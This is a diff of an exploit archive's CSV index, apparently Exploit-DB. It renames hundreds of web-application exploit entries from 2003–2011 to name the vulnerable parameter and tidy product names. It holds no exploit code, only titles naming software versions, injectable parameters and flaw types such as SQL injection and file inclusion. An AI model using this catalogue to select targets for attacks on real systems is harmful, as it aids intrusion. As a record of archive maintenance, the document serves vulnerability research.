Component DT Register - SQL Injection",2008-07-16,His0k4,php,webapps,0 -6087,platforms/php/webapps/6087.txt,"Alstrasoft Affiliate Network Pro - (pgm) SQL Injection",2008-07-16,"Hussin X",php,webapps,0 +6087,platforms/php/webapps/6087.txt,"Alstrasoft Affiliate Network Pro - 'pgm' Parameter SQL Injection",2008-07-16,"Hussin X",php,webapps,0 6088,platforms/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple SQL Injections",2008-07-16,Mr.SQL,php,webapps,0 -6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - (PHPHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 -6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0 +6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - 'viewCat' Parameter SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 +6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - 'UID' Parameter SQL Injection",2008-07-17,"Hussin X",php,webapps,0 6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0 6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 -6097,platforms/php/webapps/6097.txt,"Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0 -6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.(1.0.4) - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps,0 -6099,platforms/php/webapps/6099.txt,"Siteframe - 'folder.php id' SQL Injection",2008-07-18,n0ne,php,webapps,0 -6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 -6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 -6105,platforms/asp/webapps/6105.pl,"HRS Multi - 'picture_pic_bv.asp key' Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 
+6097,platforms/php/webapps/6097.txt,"Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection",2008-07-17,QTRinux,php,webapps,0 +6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps,0 +6099,platforms/php/webapps/6099.txt,"Siteframe CMS 3.2.3 - 'folder.php' SQL Injection",2008-07-18,n0ne,php,webapps,0 +6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 +6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - 'book_id' Parameter Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 +6105,platforms/asp/webapps/6105.pl,"HRS Multi - 'key' Parameter Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 6107,platforms/php/webapps/6107.txt,"Interact 2.4.1 - 'help.php' Local File Inclusion",2008-07-21,DSecRG,php,webapps,0 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 -6109,platforms/cgi/webapps/6109.pl,"MojoPersonals - 'mojoClassified.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 -6110,platforms/cgi/webapps/6110.pl,"MojoJobs - 'mojoJobs.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 -6111,platforms/cgi/webapps/6111.pl,"MojoAuto - 'mojoAuto.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 -6112,platforms/php/webapps/6112.txt,"EZWebAlbum (dlfilename) - Remote File Disclosure",2008-07-21,"Ghost Hacker",php,webapps,0 -6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-21,ldma,php,webapps,0 -6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - 'pid' SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0 +6109,platforms/cgi/webapps/6109.pl,"MojoPersonals - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 +6110,platforms/cgi/webapps/6110.pl,"MojoJobs - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 +6111,platforms/cgi/webapps/6111.pl,"MojoAuto - Blind SQL 
Injection",2008-07-21,Mr.SQL,cgi,webapps,0 +6112,platforms/php/webapps/6112.txt,"EZWebAlbum - Remote File Disclosure",2008-07-21,"Ghost Hacker",php,webapps,0 +6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection",2008-07-21,ldma,php,webapps,0 +6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - 'pid' Parameter SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0 6115,platforms/php/webapps/6115.txt,"EZWebAlbum - Insecure Cookie Handling",2008-07-21,"Virangar Security",php,webapps,0 -6117,platforms/php/webapps/6117.txt,"YouTube blog 0.1 - (Remote File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0 -6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll - 'default.asp catid' SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 -6125,platforms/php/webapps/6125.txt,"Atom Photoblog 1.1.5b1 - (photoId) SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 -6126,platforms/php/webapps/6126.txt,"ibase 2.03 - 'download.php' Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0 +6117,platforms/php/webapps/6117.txt,"YouTube blog 0.1 - Remote File Inclusion / SQL Injection / Cross-Site Scripting",2008-07-22,Unohope,php,webapps,0 +6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll - 'catid' Parameter SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 +6125,platforms/php/webapps/6125.txt,"Atom Photoblog 1.1.5b1 - 'photoId' Parameter SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 +6126,platforms/php/webapps/6126.txt,"ibase 2.03 - Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0 6127,platforms/php/webapps/6127.htm,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload",2008-07-24,SaO,php,webapps,0 -6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' SQL Injection",2008-07-24,IRAQI,php,webapps,0 -6131,platforms/php/webapps/6131.txt,"xrms 1.99.2 - (Remote File Inclusion / Cross-Site Scripting / Information Gathering) Multiple 
Vulnerabilities",2008-07-25,AzzCoder,php,webapps,0 +6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' Parameter SQL Injection",2008-07-24,IRAQI,php,webapps,0 +6131,platforms/php/webapps/6131.txt,"XRms 1.99.2 - Remote File Inclusion / Cross-Site Scripting / Information Gathering",2008-07-25,AzzCoder,php,webapps,0 6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' SQL Injection",2008-07-25,nuclear,php,webapps,0 -6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - (comment.php mid) SQL Injection",2008-07-25,Mr.SQL,php,webapps,0 -6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - (picture.php image_id) SQL Injection",2008-07-25,cOndemned,php,webapps,0 +6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - SQL Injection",2008-07-25,Mr.SQL,php,webapps,0 +6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - SQL Injection",2008-07-25,cOndemned,php,webapps,0 6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' Parameter SQL Injection",2008-07-26,U238,asp,webapps,0 6136,platforms/php/webapps/6136.txt,"PHPwebnews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0 6137,platforms/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0 -6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0 -6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - 'pid' SQL Injection",2008-07-26,mikeX,php,webapps,0 +6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - SQL Injection",2008-07-26,dun,php,webapps,0 +6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - 'pid' Parameter SQL Injection",2008-07-26,mikeX,php,webapps,0 6140,platforms/php/webapps/6140.txt,"phpLinkat 0.1 - Insecure Cookie Handling / SQL Injection",2008-07-26,Encrypt3d.M!nd,php,webapps,0 -6141,platforms/php/webapps/6141.txt,"TriO 2.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0 
-6142,platforms/php/webapps/6142.txt,"CMScout 2.05 - (common.php bit) Local File Inclusion",2008-07-27,"Khashayar Fereidani",php,webapps,0 -6143,platforms/php/webapps/6143.txt,"Getacoder clone - (sb_protype) SQL Injection",2008-07-27,"Hussin X",php,webapps,0 -6144,platforms/php/webapps/6144.txt,"GC Auction Platinum - (cate_id) SQL Injection",2008-07-27,"Hussin X",php,webapps,0 -6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS - (art) SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0 +6141,platforms/php/webapps/6141.txt,"TriO 2.1 - 'browse.php' SQL Injection",2008-07-26,dun,php,webapps,0 +6142,platforms/php/webapps/6142.txt,"CMScout 2.05 - 'bit' Parameter Local File Inclusion",2008-07-27,"Khashayar Fereidani",php,webapps,0 +6143,platforms/php/webapps/6143.txt,"Getacoder clone - 'sb_protype' Parameter SQL Injection",2008-07-27,"Hussin X",php,webapps,0 +6144,platforms/php/webapps/6144.txt,"GC Auction Platinum - 'cate_id' Parameter SQL Injection",2008-07-27,"Hussin X",php,webapps,0 +6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS - 'art' Parameter SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0 6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - 'story.php' SQL Injection",2008-07-28,"Hussin X",php,webapps,0 -6147,platforms/php/webapps/6147.txt,"Youtuber Clone - 'ugroups.php UID' SQL Injection",2008-07-28,"Hussin X",php,webapps,0 +6147,platforms/php/webapps/6147.txt,"Youtuber Clone - SQL Injection",2008-07-28,"Hussin X",php,webapps,0 6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 - 'Language' Local File Inclusion",2008-07-28,NoGe,php,webapps,0 6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 -6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - (language_full) Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 +6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - 'language_full' Parameter Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 
6153,platforms/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0 -6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - (category_id) SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0 -6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - 'lang' Local File Inclusion",2008-07-29,DSecRG,php,webapps,0 +6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - 'category_id' Parameter SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0 +6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - 'lang' Parameter Local File Inclusion",2008-07-29,DSecRG,php,webapps,0 6158,platforms/php/webapps/6158.pl,"e107 Plugin BLOG Engine 2.2 - Blind SQL Injection",2008-07-29,"Virangar Security",php,webapps,0 -6159,platforms/php/webapps/6159.txt,"Gregarius 0.5.4 - rsargs[] SQL Injection",2008-07-29,"GulfTech Security",php,webapps,0 -6160,platforms/php/webapps/6160.txt,"PHP Hosting Directory 2.0 - (admin.php rd) Remote File Inclusion",2008-07-29,RoMaNcYxHaCkEr,php,webapps,0 -6161,platforms/php/webapps/6161.txt,"HIOX Random Ad 1.3 - (hioxRandomAd.php hm) Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 -6162,platforms/php/webapps/6162.txt,"hiox browser Statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 +6159,platforms/php/webapps/6159.txt,"Gregarius 0.5.4 - SQL Injection",2008-07-29,"GulfTech Security",php,webapps,0 +6160,platforms/php/webapps/6160.txt,"PHP Hosting Directory 2.0 - Remote File Inclusion",2008-07-29,RoMaNcYxHaCkEr,php,webapps,0 +6161,platforms/php/webapps/6161.txt,"HIOX Random Ad 1.3 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 +6162,platforms/php/webapps/6162.txt,"HIOX Browser Statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 6163,platforms/php/webapps/6163.txt,"PHP Hosting Directory 2.0 - Insecure Cookie Handling",2008-07-30,Stack,php,webapps,0 
-6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 - (action_file) Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0 -6165,platforms/php/webapps/6165.txt,"ZeeReviews - 'comments.php ItemID' SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 +6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 - 'action_file' Parameter Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0 +6165,platforms/php/webapps/6165.txt,"ZeeReviews - SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 6166,platforms/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin",2008-07-30,Stack,php,webapps,0 -6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard - (Cat) SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 +6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard - SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 6168,platforms/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin",2008-07-30,Stack,php,webapps,0 -6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' SQL Injection",2008-07-30,"Hussin X",php,webapps,0 -6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - (UID) SQL Injection",2008-07-30,"Hussin X",php,webapps,0 +6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0 +6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - 'UID' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0 6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) - SQL Injection",2008-07-30,Jack,php,webapps,0 6172,platforms/php/webapps/6172.pl,"Pligg 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0 -6173,platforms/php/webapps/6173.txt,"pligg 9.9.0 - (Cross-Site Scripting / Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-07-30,"GulfTech Security",php,webapps,0 +6173,platforms/php/webapps/6173.txt,"pligg 9.9.0 - Cross-Site Scripting 
/ Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0 6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Login Bypass",2008-07-31,gnix,php,webapps,0 6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 - (non-patched) Remote Code Execution",2008-07-31,Raz0r,php,webapps,0 6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps,0 @@ -19606,7 +19609,7 @@ id,file,description,date,author,platform,type,port 6707,platforms/php/webapps/6707.txt,"Gforge 4.5.19 - Multiple SQL Injections",2008-10-09,beford,php,webapps,0 6708,platforms/php/webapps/6708.txt,"Gforge 4.6 rc1 - (skill_edit) SQL Injection",2008-10-09,beford,php,webapps,0 6709,platforms/php/webapps/6709.txt,"Joomla! Component Joomtracker 1.01 - SQL Injection",2008-10-09,rsauron,php,webapps,0 -6710,platforms/php/webapps/6710.txt,"camera life 2.6.2b4 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-10-09,BackDoor,php,webapps,0 +6710,platforms/php/webapps/6710.txt,"camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,php,webapps,0 6711,platforms/php/webapps/6711.htm,"Kusaba 1.0.4 - Remote Code Execution (2)",2008-10-09,Sausage,php,webapps,0 6712,platforms/php/webapps/6712.txt,"IranMC Arad Center - 'news.php id' SQL Injection",2008-10-09,"Hussin X",php,webapps,0 6713,platforms/php/webapps/6713.txt,"Scriptsez Mini Hosting Panel - 'members.php' Local File Inclusion",2008-10-09,JosS,php,webapps,0 
@@ -19924,7 +19927,7 @@ id,file,description,date,author,platform,type,port 7097,platforms/php/webapps/7097.txt,"Joomla! Component com_marketplace 1.2.1 - 'catid' SQL Injection",2008-11-11,TR-ShaRk,php,webapps,0 7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' SQL Injection",2008-11-11,"Hussin X",php,webapps,0 7101,platforms/php/webapps/7101.txt,"Alstrasoft SendIt Pro - Arbitrary File Upload",2008-11-12,ZoRLu,php,webapps,0 -7102,platforms/php/webapps/7102.txt,"Alstrasoft Article Manager Pro - (Authentication Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 +7102,platforms/php/webapps/7102.txt,"Alstrasoft Article Manager Pro 1.6 - Authentication Bypass",2008-11-12,ZoRLu,php,webapps,0 7103,platforms/php/webapps/7103.txt,"Alstrasoft Web Host Directory - (Authentication Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 7105,platforms/php/webapps/7105.txt,"Quick Poll Script - 'code.php id' SQL Injection",2008-11-12,"Hussin X",php,webapps,0 7106,platforms/php/webapps/7106.txt,"TurnkeyForms Local Classifieds - Authentication Bypass",2008-11-12,G4N0K,php,webapps,0 
@@ -20339,12 +20342,12 @@ id,file,description,date,author,platform,type,port 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection / Local File Inclusion",2008-12-30,SirGod,php,webapps,0 7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0 7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0 -7628,platforms/php/webapps/7628.txt,"viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0 +7628,platforms/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0 7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0 7631,platforms/php/webapps/7631.txt,"2Capsule - 'sticker.php id' SQL Injection",2009-01-01,Zenith,php,webapps,0 7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Cross-Site Request Forgery (Change Admin Password)",2009-01-01,x0r,php,webapps,0 7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0 -7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - (filter.php) Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0 +7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0 7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote Arbitrary .PHP File Upload",2009-01-01,Lo$er,php,webapps,0 7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0 7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - (Authentication Bypass) SQL Injection",2009-01-01,DNX,php,webapps,0 
@@ -21232,8 +21235,8 @@ id,file,description,date,author,platform,type,port 9091,platforms/php/webapps/9091.php,"Mlffat 2.2 - Blind SQL Injection",2009-07-09,Qabandi,php,webapps,0 9092,platforms/php/webapps/9092.txt,"webasyst shop-script - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-09,Vrs-hCk,php,webapps,0 9094,platforms/php/webapps/9094.txt,"EasyVillaRentalSite - 'id' SQL Injection",2009-07-09,BazOka-HaCkEr,php,webapps,0 -9095,platforms/php/webapps/9095.txt,"talkback 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0 -9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x - (SQL Injection / phpinfo()) Multiple Vulnerabilities",2009-07-09,NoGe,php,webapps,0 +9095,platforms/php/webapps/9095.txt,"TalkBack 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0 +9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x - SQL Injection / phpinfo()",2009-07-09,NoGe,php,webapps,0 9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 - (vnews.php id) SQL Injection",2009-07-09,Mr.tro0oqy,php,webapps,0 9101,platforms/php/webapps/9101.txt,"phpbms 0.96 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9103,platforms/php/webapps/9103.txt,"gencms 2006 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 
@@ -23256,7 +23259,7 @@ id,file,description,date,author,platform,type,port 12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0 12801,platforms/php/webapps/12801.txt,"osCommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,php,webapps,0 12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 -12806,platforms/php/webapps/12806.txt,"CMScout - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 +12806,platforms/php/webapps/12806.txt,"CMScout - Cross-Site Scripting / HTML Injection",2010-05-30,XroGuE,php,webapps,0 12807,platforms/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0 12808,platforms/php/webapps/12808.txt,"PTC Site's - Remote Code Execution / Cross-Site Scripting",2010-05-30,CrazyMember,php,webapps,0 12809,platforms/php/webapps/12809.txt,"Symphony CMS - Local File Inclusion",2010-05-30,AntiSecurity,php,webapps,0 
@@ -23537,7 +23540,7 @@ id,file,description,date,author,platform,type,port 14274,platforms/php/webapps/14274.txt,"Joomla! Component 'Music Manager' - Local File Inclusion",2010-07-08,Sid3^effects,php,webapps,0 14123,platforms/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 14124,platforms/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection",2010-06-30,Dante90,php,webapps,0 -14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - (products.php) Blind SQL Injection",2010-06-30,Dante90,php,webapps,0 +14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - 'products.php' Blind SQL Injection",2010-06-30,Dante90,php,webapps,0 14126,platforms/php/webapps/14126.txt,"Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0 14127,platforms/php/webapps/14127.txt,"Joomla! Component 'Joomanager' - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0 14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - 'member.php' SQL Injection",2010-06-30,Dante90,php,webapps,0 
@@ -24149,7 +24152,7 @@ id,file,description,date,author,platform,type,port 15568,platforms/php/webapps/15568.py,"chCounter 3.1.3 - SQL Injection",2010-11-18,"Matias Fontanini",php,webapps,0 15570,platforms/php/webapps/15570.php,"Joomla! Component 'com_mtree' 2.1.6 - Overwrite Cross-Site Request Forgery",2010-11-18,jdc,php,webapps,0 15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -15572,platforms/php/webapps/15572.txt,"viart shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0 +15572,platforms/php/webapps/15572.txt,"ViArt Shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0 15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 - Cross-Site Request Forgery",2010-11-19,Or4nG.M4N,php,webapps,0 15574,platforms/php/webapps/15574.txt,"Arabian YouTube Script - Blind SQL Injection",2010-11-19,R3d-D3V!L,php,webapps,0 15577,platforms/php/webapps/15577.html,"Plogger Gallery 1.0 - Cross-Site Request Forgery (Change Admin Password)",2010-11-19,Or4nG.M4N,php,webapps,0 
@@ -24292,7 +24295,7 @@ id,file,description,date,author,platform,type,port 15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection",2010-12-29,hiphop,php,webapps,0 15849,platforms/php/webapps/15849.txt,"LoveCMS 1.6.2 - Cross-Site Request Forgery / Code Injection",2010-12-29,hiphop,php,webapps,0 15850,platforms/php/webapps/15850.html,"PiXie CMS 1.04 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0 -15852,platforms/php/webapps/15852.txt,"Siteframe 3.2.3 - (user.php) SQL Injection",2010-12-29,"AnGrY BoY",php,webapps,0 +15852,platforms/php/webapps/15852.txt,"Siteframe CMS 3.2.3 - 'user.php' SQL Injection",2010-12-29,"AnGrY BoY",php,webapps,0 15853,platforms/php/webapps/15853.txt,"DGNews 2.1 - SQL Injection",2010-12-29,kalashnikov,php,webapps,0 15856,platforms/php/webapps/15856.php,"TYPO3 - Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0 
@@ -24338,7 +24341,7 @@ id,file,description,date,author,platform,type,port 15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0 16020,platforms/php/webapps/16020.txt,"PHP Lowbids - viewfaqs.php Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0 15989,platforms/php/webapps/15989.txt,"Joomla! Component 'com_people' 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0 -15993,platforms/php/webapps/15993.html,"viart shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,php,webapps,0 +15993,platforms/php/webapps/15993.html,"ViArt Shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,php,webapps,0 15995,platforms/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",2011-01-15,Saif,php,webapps,0 15996,platforms/php/webapps/15996.txt,"CompactCMS 1.4.1 - Multiple Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0 15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution",2011-01-16,mr_me,jsp,webapps,0 
@@ -26054,9 +26057,8 @@ id,file,description,date,author,platform,type,port 22380,platforms/cgi/webapps/22380.pl,"Smart Search 4.25 - Remote Command Execution",2003-01-05,knight420,cgi,webapps,0 22382,platforms/php/webapps/22382.txt,"Mambo Site Server 4.0.10 - 'index.php' Cross-Site Scripting",2003-03-18,"Ertan Kurt",php,webapps,0 22383,platforms/php/webapps/22383.txt,"Basit 1.0 Submit Module - Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 -22384,platforms/php/webapps/22384.txt,"Siteframe 2.2.4 - search.php Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 22385,platforms/php/webapps/22385.txt,"Basit 1.0 Search Module - Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 -22386,platforms/php/webapps/22386.txt,"Siteframe 2.2.4 - download.php Information Disclosure",2003-03-19,"Ertan Kurt",php,webapps,0 +22386,platforms/php/webapps/22386.txt,"Siteframe CMS 2.2.4 - 'download.php' Information Disclosure",2003-03-19,"Ertan Kurt",php,webapps,0 22387,platforms/php/webapps/22387.txt,"DCP-Portal 5.3.1 - calendar.php Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 22389,platforms/php/webapps/22389.txt,"XOOPS 2.0 XoopsOption - Information Disclosure",2003-03-20,"gregory Le Bras",php,webapps,0 22391,platforms/php/webapps/22391.txt,"osCommerce 2.1/2.2 - Error_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 
